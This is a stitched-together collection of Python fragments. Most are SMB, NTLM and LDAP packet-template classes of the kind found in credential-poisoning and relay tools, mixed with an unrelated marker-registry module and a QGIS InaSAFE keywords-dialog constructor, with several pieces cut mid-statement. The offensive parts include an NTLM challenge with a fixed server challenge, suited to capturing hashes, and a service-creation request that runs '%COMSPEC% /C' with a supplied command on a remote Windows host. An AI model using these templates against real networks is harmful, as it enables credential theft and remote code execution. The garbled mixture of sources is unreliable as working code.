str( self.fields["NegTokenInitSeqNLMPTag2"] ) + str( self.fields["NegTokenInitSeqNLMPTag2Len"] ) + str( self.fields["NegTokenInitSeqNLMPTag2Octet"] ) + str( self.fields["NegTokenInitSeqNLMPTag2OctetLen"] ) + str( self.fields["NegTokenInitSeqMechSignature"] ) + str( self.fields["NegTokenInitSeqMechMessageType"] ) + str( self.fields["NegTokenInitSeqMechMessageFlags"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"] ) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) data4 = str(self.fields["NegTokenInitSeqHeadTag1"]) + str( self.fields["NegTokenInitSeqHeadLen1"] ) + str(self.fields["NegTokenInitSeqNLMPTag"]) + str( self.fields["NegTokenInitSeqNLMPLen"] ) + str(self.fields["NegTokenInitSeqNLMPTag1"]) + str( self.fields["NegTokenInitSeqNLMPTag1Len"] ) + str(self.fields["NegTokenInitSeqNLMPTag1Str"]) + str( self.fields["NegTokenInitSeqNLMPTag2"] ) + str(self.fields["NegTokenInitSeqNLMPTag2Len"]) + str( self.fields["NegTokenInitSeqNLMPTag2Octet"] ) + str( self.fields["NegTokenInitSeqNLMPTag2OctetLen"] ) + str( self.fields["NegTokenInitSeqMechSignature"] ) + str( self.fields["NegTokenInitSeqMechMessageType"] ) + str( self.fields["NegTokenInitSeqMechMessageFlags"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"] ) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) data5 = str(self.fields["ApplicationHeaderTag"]) + str( self.fields["ApplicationHeaderLen"] ) + str(self.fields["AsnSecMechType"]) + str( self.fields["AsnSecMechLen"] ) + str(self.fields["AsnSecMechStr"]) + str( self.fields["ChoosedTag"] ) + str(self.fields["ChoosedTagStrLen"]) + str( self.fields["NegTokenInitSeqHeadTag"] ) + str( self.fields["NegTokenInitSeqHeadLen"] ) + str( self.fields["NegTokenInitSeqHeadTag1"] ) + str( self.fields["NegTokenInitSeqHeadLen1"] ) + str( self.fields["NegTokenInitSeqNLMPTag"] ) + str( self.fields["NegTokenInitSeqNLMPLen"] ) + str( self.fields["NegTokenInitSeqNLMPTag1"] ) + str( self.fields["NegTokenInitSeqNLMPTag1Len"] ) + str( self.fields["NegTokenInitSeqNLMPTag1Str"] ) + str( self.fields["NegTokenInitSeqNLMPTag2"] ) + str( self.fields["NegTokenInitSeqNLMPTag2Len"] ) + str( self.fields["NegTokenInitSeqNLMPTag2Octet"] ) + str( self.fields["NegTokenInitSeqNLMPTag2OctetLen"] ) + str( self.fields["NegTokenInitSeqMechSignature"] ) + str( self.fields["NegTokenInitSeqMechMessageType"] ) + str( self.fields["NegTokenInitSeqMechMessageFlags"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"] ) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionTerminator"] ) + str(self.fields["nativeOs"]) + str( self.fields["nativeOsterminator"]) + str( self.fields["nativelan"]) + str( self.fields["nativelanterminator"]) data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"]) + str( self.fields["NegTokenInitSeqNLMPTag2OctetLen"] ) + str(self.fields["NegTokenInitSeqMechSignature"]) + str( self.fields["NegTokenInitSeqMechMessageType"] ) + str(self.fields["NegTokenInitSeqMechMessageFlags"]) + str( self.fields["NegTokenInitSeqMechMessageDomainNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"] ) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) data7 = str(self.fields["NegTokenInitSeqMechSignature"]) + str( self.fields["NegTokenInitSeqMechMessageType"] ) + str(self.fields["NegTokenInitSeqMechMessageFlags"]) + str( self.fields["NegTokenInitSeqMechMessageDomainNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"] ) + str( self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"] ) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"]) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) data10 = str(self.fields["NegTokenInitSeqNLMPTag"]) + str( self.fields["NegTokenInitSeqNLMPLen"]) + str( self.fields["NegTokenInitSeqNLMPTag1"]) + str( self.fields["NegTokenInitSeqNLMPTag1Len"]) + str( self.fields["NegTokenInitSeqNLMPTag1Str"]) data11 = str(self.fields["NegTokenInitSeqNLMPTag1"]) + str( self.fields["NegTokenInitSeqNLMPTag1Len"]) + str( self.fields["NegTokenInitSeqNLMPTag1Str"]) ## Packet len self.fields["andxoffset"] = struct.pack("<h", len(CompleteSMBPacketLen) + 32) ##Buff Len self.fields["securitybloblength"] = struct.pack("<h", len(SecBlobLen)) ##Complete Buff Len self.fields["bcc1"] = struct.pack("<h", len(CompleteSMBPacketLen) - 27) ##App Header self.fields["ApplicationHeaderLen"] = struct.pack( "<B", len(SecBlobLen) - 2) ##Asn Field 1 self.fields["AsnSecMechLen"] = struct.pack( "<B", len(str(self.fields["AsnSecMechStr"]))) ##Asn Field 1 self.fields["ChoosedTagStrLen"] = struct.pack("<B", len(data3)) ##SpNegoTokenLen self.fields["NegTokenInitSeqHeadLen"] = struct.pack("<B", len(data4)) ##NegoTokenInit self.fields["NegTokenInitSeqHeadLen1"] = struct.pack("<B", len(data10)) ## Tag0 Len self.fields["NegTokenInitSeqNLMPLen"] = struct.pack("<B", len(data11)) ## Tag0 Str Len self.fields["NegTokenInitSeqNLMPTag1Len"] = struct.pack( "<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"]))) ## Tag2 Len self.fields["NegTokenInitSeqNLMPTag2Len"] = struct.pack( "<B", len(data6)) ## Tag3 Len self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = struct.pack( "<B", len(data7))
class SMB2SessionAcceptData(Packet): fields = OrderedDict([ ("Len", "\x09\x00"), ("SessionFlag", "\x01\x00"), ("SecBlobOffSet", "\x48\x00"), ("SecBlobLen", "\x1d\x00"), ("SecBlobTag0", "\xa1"), ("SecBlobTag0Len", "\x1b"), ("NegTokenResp", "\x30"), ("NegTokenRespLen", "\x19"), ("NegTokenRespTag0", "\xa0"), ("NegTokenRespTag0Len", "\x03"), ("NegStateResp", "\x0a"), ("NegTokenRespLen1", "\x01"), ("NegTokenRespStr", "\x00"), ("SecBlobTag3", "\xa3"), ("SecBlobTag3Len", "\x12"), ("SecBlobOctetHeader", "\x04"), ("SecBlobOctetLen", "\x10"), ("MechlistMICVersion", ""), # No verification on the client side... ("MechlistCheckSum", ""), ("MechlistSeqNumber", ""), ("Data", ""), ]) def calculate(self): ###### SecBlobLen Calc: CalculateSecBlob = str(self.fields["SecBlobTag0"]) + str( self.fields["SecBlobTag0Len"] ) + str(self.fields["NegTokenResp"]) + str( self.fields["NegTokenRespLen"] ) + str(self.fields["NegTokenRespTag0"]) + str( self.fields["NegTokenRespTag0Len"] ) + str(self.fields["NegStateResp"]) + str( self.fields["NegTokenRespLen1"]) + str( self.fields["NegTokenRespStr"]) + str( self.fields["SecBlobTag3"]) + str( self.fields["SecBlobTag3Len"]) + str( self.fields["SecBlobOctetHeader"]) + str( self.fields["SecBlobOctetLen"]) + str( self.fields["MechlistMICVersion"]) + str( self.fields["MechlistCheckSum"]) + str( self.fields["MechlistSeqNumber"]) CalculateASN = str(self.fields["NegTokenResp"]) + str( self.fields["NegTokenRespLen"] ) + str(self.fields["NegTokenRespTag0"]) + str( self.fields["NegTokenRespTag0Len"] ) + str(self.fields["NegStateResp"]) + str( self.fields["NegTokenRespLen1"]) + str( self.fields["NegTokenRespStr"]) + str( self.fields["SecBlobTag3"]) + str( self.fields["SecBlobTag3Len"]) + str( self.fields["SecBlobOctetHeader"]) + str( self.fields["SecBlobOctetLen"]) + str( self.fields["MechlistMICVersion"]) + str( self.fields["MechlistCheckSum"]) + str( self.fields["MechlistSeqNumber"]) MechLen = str(self.fields["SecBlobOctetHeader"]) + str( self.fields["SecBlobOctetLen"]) + str( self.fields["MechlistMICVersion"]) + str( self.fields["MechlistCheckSum"]) + str( self.fields["MechlistSeqNumber"]) #Packet Struct len self.fields["SecBlobLen"] = struct.pack("<h", len(CalculateSecBlob)) self.fields["SecBlobTag0Len"] = struct.pack("<B", len(CalculateASN)) self.fields["NegTokenRespLen"] = struct.pack("<B", len(CalculateASN) - 2) self.fields["SecBlobTag3Len"] = struct.pack("<B", len(MechLen)) self.fields["SecBlobOctetLen"] = struct.pack("<B", len(MechLen) - 2)
#!/usr/bin/env python import logging from odict import OrderedDict _name_to_marker = OrderedDict() def get_marker_names(): global _name_to_marker return _name_to_marker.keys() def register_marker(name, group='signal', needs_transform=True): global _name_to_marker _name_to_marker[name] = Marker(name, group, needs_transform) return _name_to_marker[name] def marker_from_name(name): return _name_to_marker.get(name, None) def is_marker_registered(name): return name in _name_to_marker class Marker(object): def __init__(self, name, group, needs_transform): self.name = name self.needs_transform = needs_transform self.group = group def __str__(self): return self.name def __repr__(self):
class SMBNegoKerbAns(Packet): fields = OrderedDict([ ("Wordcount", "\x11"), ("Dialect", ""), ("Securitymode", "\x03"), ("MaxMpx", "\x32\x00"), ("MaxVc", "\x01\x00"), ("MaxBuffSize", "\x04\x41\x00\x00"), ("MaxRawBuff", "\x00\x00\x01\x00"), ("SessionKey", "\x00\x00\x00\x00"), ("Capabilities", "\xfd\xf3\x01\x80"), ("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"), ("SrvTimeZone", "\xf0\x00"), ("KeyLen", "\x00"), ("Bcc", "\x57\x00"), ("Guid", "\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"), ("InitContextTokenASNId", "\x60"), ("InitContextTokenASNLen", "\x5b"), ("ThisMechASNId", "\x06"), ("ThisMechASNLen", "\x06"), ("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"), ("SpNegoTokenASNId", "\xA0"), ("SpNegoTokenASNLen", "\x51"), ("NegTokenASNId", "\x30"), ("NegTokenASNLen", "\x4f"), ("NegTokenTag0ASNId", "\xA0"), ("NegTokenTag0ASNLen", "\x30"), ("NegThisMechASNId", "\x30"), ("NegThisMechASNLen", "\x2e"), ("NegThisMech1ASNId", "\x06"), ("NegThisMech1ASNLen", "\x09"), ("NegThisMech1ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"), ("NegThisMech2ASNId", "\x06"), ("NegThisMech2ASNLen", "\x09"), ("NegThisMech2ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"), ("NegThisMech3ASNId", "\x06"), ("NegThisMech3ASNLen", "\x0a"), ("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"), ("NegThisMech4ASNId", "\x06"), ("NegThisMech4ASNLen", "\x09"), ("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"), ("NegTokenTag3ASNId", "\xA3"), ("NegTokenTag3ASNLen", "\x1b"), ("NegHintASNId", "\x30"), ("NegHintASNLen", "\x19"), ("NegHintTag0ASNId", "\xa0"), ("NegHintTag0ASNLen", "\x17"), ("NegHintFinalASNId", "\x1b"), ("NegHintFinalASNLen", "\x15"), ("NegHintFinalASNStr", "[email protected]"), ]) def calculate(self): CompleteBCCLen1 = str(self.fields["Guid"]) + str( self.fields["InitContextTokenASNId"] ) + str(self.fields["InitContextTokenASNLen"]) + str( self.fields["ThisMechASNId"] ) + str(self.fields["ThisMechASNLen"]) + str( self.fields["ThisMechASNStr"] ) + str(self.fields["SpNegoTokenASNId"]) + str( self.fields["SpNegoTokenASNLen"]) + str( self.fields["NegTokenASNId"]) + str( self.fields["NegTokenASNLen"]) + str( self.fields["NegTokenTag0ASNId"]) + str( self.fields["NegTokenTag0ASNLen"]) + str( self.fields["NegThisMechASNId"]) + str( self.fields["NegThisMechASNLen"]) + str( self.fields["NegThisMech1ASNId"] ) + str( self.fields["NegThisMech1ASNLen"] ) + str( self.fields["NegThisMech1ASNStr"] ) + str( self.fields["NegThisMech2ASNId"] ) + str( self.fields["NegThisMech2ASNLen"] ) + str( self.fields["NegThisMech2ASNStr"] ) + str( self.fields["NegThisMech3ASNId"] ) + str( self.fields["NegThisMech3ASNLen"] ) + str( self.fields["NegThisMech3ASNStr"] ) + str( self.fields["NegThisMech4ASNId"] ) + str( self.fields["NegThisMech4ASNLen"] ) + str( self.fields["NegThisMech4ASNStr"] ) + str( self.fields["NegTokenTag3ASNId"] ) + str( self.fields["NegTokenTag3ASNLen"] ) + str(self.fields["NegHintASNId"]) + str( self.fields["NegHintASNLen"]) + str( self.fields["NegHintTag0ASNId"] ) + str( self.fields["NegHintTag0ASNLen"] ) + str( self.fields["NegHintFinalASNId"] ) + str( self.fields["NegHintFinalASNLen"] ) + str( self.fields["NegHintFinalASNStr"]) AsnLenStart = str(self.fields["ThisMechASNId"]) + str( self.fields["ThisMechASNLen"] ) + str(self.fields["ThisMechASNStr"]) + str( self.fields["SpNegoTokenASNId"] ) + str(self.fields["SpNegoTokenASNLen"]) + str( self.fields["NegTokenASNId"] ) + str(self.fields["NegTokenASNLen"]) + str( self.fields["NegTokenTag0ASNId"]) + str( self.fields["NegTokenTag0ASNLen"]) + str( self.fields["NegThisMechASNId"]) + str( self.fields["NegThisMechASNLen"]) + str( self.fields["NegThisMech1ASNId"]) + str( self.fields["NegThisMech1ASNLen"]) + str( self.fields["NegThisMech1ASNStr"]) + str( self.fields["NegThisMech2ASNId"] ) + str( self.fields["NegThisMech2ASNLen"] ) + str( self.fields["NegThisMech2ASNStr"] ) + str( self.fields["NegThisMech3ASNId"] ) + str( self.fields["NegThisMech3ASNLen"] ) + str( self.fields["NegThisMech3ASNStr"] ) + str( self.fields["NegThisMech4ASNId"] ) + str( self.fields["NegThisMech4ASNLen"] ) + str( self.fields["NegThisMech4ASNStr"] ) + str( self.fields["NegTokenTag3ASNId"] ) + str( self.fields["NegTokenTag3ASNLen"] ) + str(self.fields["NegHintASNId"]) + str( self.fields["NegHintASNLen"]) + str( self.fields["NegHintTag0ASNId"] ) + str( self.fields["NegHintTag0ASNLen"] ) + str( self.fields["NegHintFinalASNId"] ) + str( self.fields["NegHintFinalASNLen"] ) + str( self.fields["NegHintFinalASNStr"]) AsnLen2 = str(self.fields["NegTokenASNId"]) + str( self.fields["NegTokenASNLen"] ) + str(self.fields["NegTokenTag0ASNId"]) + str( self.fields["NegTokenTag0ASNLen"] ) + str(self.fields["NegThisMechASNId"]) + str( self.fields["NegThisMechASNLen"] ) + str(self.fields["NegThisMech1ASNId"]) + str( self.fields["NegThisMech1ASNLen"]) + str( self.fields["NegThisMech1ASNStr"]) + str( self.fields["NegThisMech2ASNId"]) + str( self.fields["NegThisMech2ASNLen"]) + str( self.fields["NegThisMech2ASNStr"]) + str( self.fields["NegThisMech3ASNId"]) + str( self.fields["NegThisMech3ASNLen"]) + str( self.fields["NegThisMech3ASNStr"] ) + str( self.fields["NegThisMech4ASNId"] ) + str( self.fields["NegThisMech4ASNLen"] ) + str( self.fields["NegThisMech4ASNStr"] ) + str( self.fields["NegTokenTag3ASNId"] ) + str( self.fields["NegTokenTag3ASNLen"] ) + str(self.fields["NegHintASNId"]) + str( self.fields["NegHintASNLen"]) + str( self.fields["NegHintTag0ASNId"] ) + str( self.fields["NegHintTag0ASNLen"] ) + str( self.fields["NegHintFinalASNId"] ) + str( self.fields["NegHintFinalASNLen"] ) + str( self.fields["NegHintFinalASNStr"]) MechTypeLen = str(self.fields["NegThisMechASNId"]) + str( self.fields["NegThisMechASNLen"] ) + str(self.fields["NegThisMech1ASNId"]) + str( self.fields["NegThisMech1ASNLen"] ) + str(self.fields["NegThisMech1ASNStr"]) + str( self.fields["NegThisMech2ASNId"] ) + str(self.fields["NegThisMech2ASNLen"]) + str( self.fields["NegThisMech2ASNStr"]) + str( self.fields["NegThisMech3ASNId"]) + str( self.fields["NegThisMech3ASNLen"]) + str( self.fields["NegThisMech3ASNStr"]) + str( self.fields["NegThisMech4ASNId"]) + str( self.fields["NegThisMech4ASNLen"]) + str( self.fields["NegThisMech4ASNStr"]) Tag3Len = str(self.fields["NegHintASNId"]) + str( self.fields["NegHintASNLen"]) + str( self.fields["NegHintTag0ASNId"]) + str( self.fields["NegHintTag0ASNLen"]) + str( self.fields["NegHintFinalASNId"]) + str( self.fields["NegHintFinalASNLen"]) + str( self.fields["NegHintFinalASNStr"]) self.fields["Bcc"] = struct.pack("<h", len(CompleteBCCLen1)) self.fields["InitContextTokenASNLen"] = struct.pack( "<B", len(AsnLenStart)) self.fields["ThisMechASNLen"] = struct.pack( "<B", len(str(self.fields["ThisMechASNStr"]))) self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2)) self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2) - 2) self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen)) self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen) - 2) self.fields["NegThisMech1ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech1ASNStr"]))) self.fields["NegThisMech2ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech2ASNStr"]))) self.fields["NegThisMech3ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech3ASNStr"]))) self.fields["NegThisMech4ASNLen"] = struct.pack( "<B", len(str(self.fields["NegThisMech4ASNStr"]))) self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len)) self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len) - 2) self.fields["NegHintFinalASNLen"] = struct.pack( "<B", len(str(self.fields["NegHintFinalASNStr"])))
def __init__(self, parent, iface, theDock=None): """Constructor for the dialog. .. note:: In QtDesigner the advanced editor's predefined keywords list should be shown in english always, so when adding entries to cboKeyword, be sure to choose :safe_qgis:`Properties<<` and untick the :safe_qgis:`translatable` property. Args: * parent - parent widget of this dialog * iface - a Quantum GIS QGisAppInterface instance. * theDock - Optional dock widget instance that we can notify of changes to the keywords. Returns: not applicable Raises: no exceptions explicitly raised """ QtGui.QDialog.__init__(self, parent) self.setupUi(self) self.setWindowTitle(self.tr('InaSAFE %s Keywords Editor' % __version__)) self.keywordIO = KeywordIO() # note the keys should remain untranslated as we need to write # english to the keywords file. The keys will be written as user data # in the combo entries. # .. seealso:: http://www.voidspace.org.uk/python/odict.html self.standardExposureList = OrderedDict([ ('population [density]', self.tr('population [density]')), ('population [count]', self.tr('population [count]')), ('building', self.tr('building')), ('building [osm]', self.tr('building [osm]')), ('building [sigab]', self.tr('building [sigab]')), ('roads', self.tr('roads')) ]) self.standardHazardList = OrderedDict([ ('earthquake [MMI]', self.tr('earthquake [MMI]')), ('tsunami [m]', self.tr('tsunami [m]')), ('tsunami [wet/dry]', self.tr('tsunami [wet/dry]')), ('tsunami [feet]', self.tr('tsunami [feet]')), ('flood [m]', self.tr('flood [m]')), ('flood [wet/dry]', self.tr('flood [wet/dry]')), ('flood [feet]', self.tr('flood [feet]')), ('tephra [kg2/m2', self.tr('tephra [kg2/m2]')) ]) # Save reference to the QGIS interface and parent self.iface = iface self.parent = parent self.dock = theDock # Set up things for context help myButton = self.buttonBox.button(QtGui.QDialogButtonBox.Help) QtCore.QObject.connect(myButton, QtCore.SIGNAL('clicked()'), self.showHelp) self.helpDialog = None # set some inital ui state: self.pbnAdvanced.setChecked(True) self.pbnAdvanced.toggle() self.radPredefined.setChecked(True) self.adjustSize() #myButton = self.buttonBox.button(QtGui.QDialogButtonBox.Ok) #myButton.setEnabled(False) self.layer = self.iface.activeLayer() if self.layer: self.loadStateFromKeywords()
class SMBSessEmpty(Packet): fields = OrderedDict([ ("Empty", "\x00\x00\x00"), ])
class SMBDCESVCCTLCreateService(Packet): fields = OrderedDict([ ("ContextHandle", ""), ("MaxCount", "\x0c\x00\x00\x00"), ("Offset", "\x00\x00\x00\x00"), ("ActualCount", "\x0c\x00\x00\x00"), ("ServiceName", "AyAGaxwLhCP"), ("MachineNameNull", "\x00\x00"), ("ReferentID", "\x9c\xfa\x9a\xc9"), ("MaxCountRefID", "\x11\x00\x00\x00"), ("OffsetID", "\x00\x00\x00\x00"), ("ActualCountRefID", "\x11\x00\x00\x00"), ("DisplayNameID", "DhhUFcsvrfJvLwRq"), ("DisplayNameIDNull", "\x00\x00\x00\x00"), ("AccessMask", "\xff\x01\x0f\x00"), ("ServerType", "\x10\x01\x00\x00"), ("ServiceStartType", "\x03\x00\x00\x00"), ("ServiceErrorCtl", "\x00\x00\x00\x00"), ("BinPathMaxCount", "\xb6\x00\x00\x00"), ("BinPathOffset", "\x00\x00\x00\x00"), ("BinPathActualCount", "\xb6\x00\x00\x00"), ("BinPathName", "%COMSPEC% /C \""), ("BinCMD", ""), ("BintoEnd", "\""), ("BinPathNameNull", "\x00\x00"), ("Nullz", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" ), ]) def calculate(self): BinDataLen = str(self.fields["BinPathName"]) + str( self.fields["BinCMD"]) + str(self.fields["BintoEnd"]) ## Calculate first self.fields["BinPathMaxCount"] = struct.pack("<i", len(BinDataLen) + 1) self.fields["BinPathActualCount"] = struct.pack( "<i", len(BinDataLen) + 1) self.fields["MaxCount"] = struct.pack( "<i", len(str(self.fields["ServiceName"])) + 1) self.fields["ActualCount"] = struct.pack( "<i", len(str(self.fields["ServiceName"])) + 1) self.fields["MaxCountRefID"] = struct.pack( "<i", len(str(self.fields["DisplayNameID"])) + 1) self.fields["ActualCountRefID"] = struct.pack( "<i", len(str(self.fields["DisplayNameID"])) + 1) ## Then convert to UTF-16LE, yeah it's weird.. self.fields["ServiceName"] = self.fields["ServiceName"].encode( 'utf-16le') self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode( 'utf-16le') self.fields["BinPathName"] = self.fields["BinPathName"].encode( 'utf-16le') self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le') self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
class LDAPNTLMChallenge(Packet): fields = OrderedDict([ ("ParserHeadASNID", "\x30"), ("ParserHeadASNLenOfLen", "\x84"), ("ParserHeadASNLen", "\x00\x00\x00\xD0"), #208 ("MessageIDASNID", "\x02"), ("MessageIDASNLen", "\x01"), ("MessageIDASNStr", "\x02"), ("OpHeadASNID", "\x61"), ("OpHeadASNIDLenOfLen", "\x84"), ("OpHeadASNIDLen", "\x00\x00\x00\xc7"), #199 ("Status", "\x0A"), ("StatusASNLen", "\x01"), ("StatusASNStr", "\x0e"), #In Progress. ("MatchedDN", "\x04\x00"), #Null ("ErrorMessage", "\x04\x00"), #Null ("SequenceHeader", "\x87"), ("SequenceHeaderLenOfLen", "\x81"), ("SequenceHeaderLen", "\x82"), #188 ("NTLMSSPSignature", "NTLMSSP"), ("NTLMSSPSignatureNull", "\x00"), ("NTLMSSPMessageType", "\x02\x00\x00\x00"), ("NTLMSSPNtWorkstationLen", "\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), ("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"), ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen", "\x94\x00"), ("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"), ("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionHigh", "\x05"), ("NegTokenInitSeqMechMessageVersionLow", "\x02"), ("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"), ("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"), ("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"), ("NTLMSSPNtWorkstationName", "SMB12"), ("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"), ("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"), ("NTLMSSPNTLMChallengeAVPairsUnicodeStr", "smb12"), ("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"), ("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", "SERVER2008"), ("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"), ("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", "smb12.local"), ("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"), ("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", "SERVER2008.smb12.local"), ("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"), ("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"), ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", "smb12.local"), ("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"), ("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"), ]) def calculate(self): ##Convert strings to Unicode first... self.fields["NTLMSSPNtWorkstationName"] = self.fields[ "NTLMSSPNtWorkstationName"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le') ###### Workstation Offset CalculateOffsetWorkstation = str( self.fields["NTLMSSPSignature"] ) + str(self.fields["NTLMSSPSignatureNull"]) + str( self.fields["NTLMSSPMessageType"] ) + str(self.fields["NTLMSSPNtWorkstationLen"]) + str( self.fields["NTLMSSPNtWorkstationMaxLen"] ) + str(self.fields["NTLMSSPNtWorkstationBuffOffset"]) + str( self.fields["NTLMSSPNtNegotiateFlags"] ) + str(self.fields["NTLMSSPNtServerChallenge"]) + str( self.fields["NTLMSSPNtReserved"]) + str( self.fields["NTLMSSPNtTargetInfoLen"]) + str( 